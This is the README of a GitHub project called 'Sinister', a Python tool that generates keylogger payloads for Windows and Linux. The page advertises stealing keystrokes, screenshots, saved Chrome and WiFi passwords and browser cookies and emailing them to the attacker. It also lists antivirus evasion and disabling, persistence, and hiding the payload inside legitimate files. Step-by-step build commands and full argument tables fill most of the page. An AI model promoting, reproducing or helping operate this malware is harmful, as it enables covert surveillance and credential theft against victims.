Sinister
Sinister is Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info
Install / Use
/learn @PushpenderIndia/SinisterREADME
This small python script can do really awesome work.
Sinister is Keylogger Generator for Windows/Linux, which sends key-logs & screenshot via email with other juicy target info written in Python 3.
Disclaimer
<p align="center"> :computer: This project was created only for good purposes and personal use. </p>THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Features
- [x] Works on Windows/Linux
- [x] Notify New Victim Via Email
- [x] Undetectable
- [x] Persistence
- [x] Email Credentials Validation before Payload Generation.
- [x] Can receive Keylogs in any email provider such as GMAIL, YAHOO, OUTLOOK, Custom SMTP.
- SMTP Server/ Port
| Server Name | SMTP Server | SMTP Port | | ----------- | ----------- | --------- | | GMAIL | smtp.gmail.com | 587 | | OUTLOOK | smtp-mail.outlook.com | 587 | | YAHOO | smtp.mail.yahoo.com | 587 |
- [x] Sends Screenshot of Victim PC's Screen via email
- [x] Creates Executable Binary With Zero Dependencies
- [x] Create less size ~ 5mb payload with advance functionality
- [x] Obfusticate the Payload before Generating it, hence Bypassing few more antivirus
- [x] Generated Payload is Encoded with base64, hence makes extremely difficult to reverse engineer the payload
- [x] Function to Kill Antivirus on Victim PC and tries to disable the security
- [x] Awesome Colourful Interface to generate payload
- [x] On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
- [x] Distinguish Log Data on the Basics of Active Window Name (Check Image for Better Understanding)
- [x] Able to add custom Icon to evil file
- [x] Built-in Binder which can bind Keylogger to Any File [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service.
- [x] Checks for Already Running Instance on System, If running instance found, then only legitimate file is executed [Multiple Instance Prohibiter to avoid Receiving Duplicate Email Logs].
- [x] Attacker can Create/Compile for Both Windows/Linux OS Using Linux System, But Can only Create/Compile Windows Executable using Windows Machine
- [x] Retrieves Saved Passwords from victim System and sends it to Attacker.
| Built-in Stealer Can Steal These Things : | | ----------------------------------------------------------- | | Chrome Browser (Saved Password) | | WiFi (Saved Password) | | Chrome Cookies (Login Data, Cookies, History) | | Firefox Cookies (cookies.sqlite) |
Note: Custom Stealer is Coded, does not relies on LaZagne
- [x] Grabs & Send Useful Information of Victim's Device
| These Things are Grabbed & Sended: | | -----------------------------------| | Operating System | | Computer Name | | User Name | | Public IPv4 |
- [x] If your payload is unable to execute, then specify --debug to run exe on foreground with CMD
Important
On 30 May 2022, Google has removed less secure apps feature, so instead of Gmail Password:
- Enable 2FA on your attacker gmail
- Create App Specific Password
- Use that
app specific password, while creating payload. - How to Create App Specific Password: Click Here
Tested On
Kali Linux - ROLLING EDITION
Windows 10
Windows 8.1 - Pro
Windows 7 - Ultimate
Prerequisite
- [x] Python 3.X
- [x] Few External Modules
How To Use in Linux
# Navigate to the /opt directory (optional)
$ cd /opt/
# Clone this repository
$ git clone https://github.com/PushpenderIndia/Sinister.git
# Navigate to Sinister folder
$ cd Sinister
# Installing dependencies
$ bash installer_linux.sh
*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
* Click on custom install
* Select Path to : C:/Python37-32
### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32
# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py
$ chmod +x Sinister.py
$ python3 Sinister.py --help
# Making Payload/RAT
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path
# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path
# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path
# Making Payload using YAHOO SMTP Server, Port Configuration
$ python3 Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
How To Use in Windows
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/PushpenderIndia/Sinister.git
# Go into the repository
$ cd Sinister
# Installing dependencies
$ python -m pip install -r requirements.txt
# Open Sinister.py in Text editor and Configure Line 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"
# Getting Help Menu
$ python Sinister.py --help
# Making Payload/RAT
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path
# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass-w -o output_file_name --icon icon_path
# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path
# Making Payload using YAHOO SMTP Server, Port Configuration
$ python Sinister.py -e youremail@gmail.com -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
How to Update
- Run updater.py to Update Autmatically or Download the latest Zip from this GitHub repo
- Note: Git Must be Installed in order to use updater.py
Note:- Evil File will be saved inside dist/ folder, inside Sinister/ folder
Available Arguments
- Optional Arguments
| Short Hand | Full Hand | Description | | ---------- | --------- | ----------- | | -h | --help | show this help message and exit | | -i INTERVAL | --interval INTERVAL | Time between reports in seconds. default=120| | -t TIME_PERSISTENT | --persistence TIME_PERSISTENT | Becoming Persistence After __ seconds. default=10 | | -x SMTP_Server | --smtp | Custom SMTP Server . default="smtp.gmail.com" | | -y SMTP_Port | --port | Custom SMTP Port . default=587 | | -w | --windows | Generate a Windows executable. | | -l | --linux | Generate a Linux executable. | | -s | --steal-password | Steal Saved Password from Victim Machine [Supported OS : Windows] | | -b file.txt | --bind LEGITIMATE_FILE_PATH.pdf | AutoBinder : Specify Path of Legitimate file. [Supported OS : Windows] | | -d | --debug | Payload Will Run In Foreground with CMD Window, To get Appropriate Execution Error |
Note : Either -w/--windows or -l/--linux must be specified
- Required Arguments
| Short Hand | Full Hand | Description | | ---------- | --------- | ----------- | | | --icon ICON | Specify Icon Path, Icon of Evil File [Note : Must Be .ico] | | -e EMAIL | --email EMAIL | Email address to send reports to. | | -p PASSWORD | --password PASSWORD | Password for the email address given in the -e argument. | | -o OUT | --out OUT | Output file name.|
New Screenshots:
Getting Help
Generating payload
Getting report
Log Data is Distinguished on The Basics of Active Window Name ~ Feature Added to v1.3 & Onward
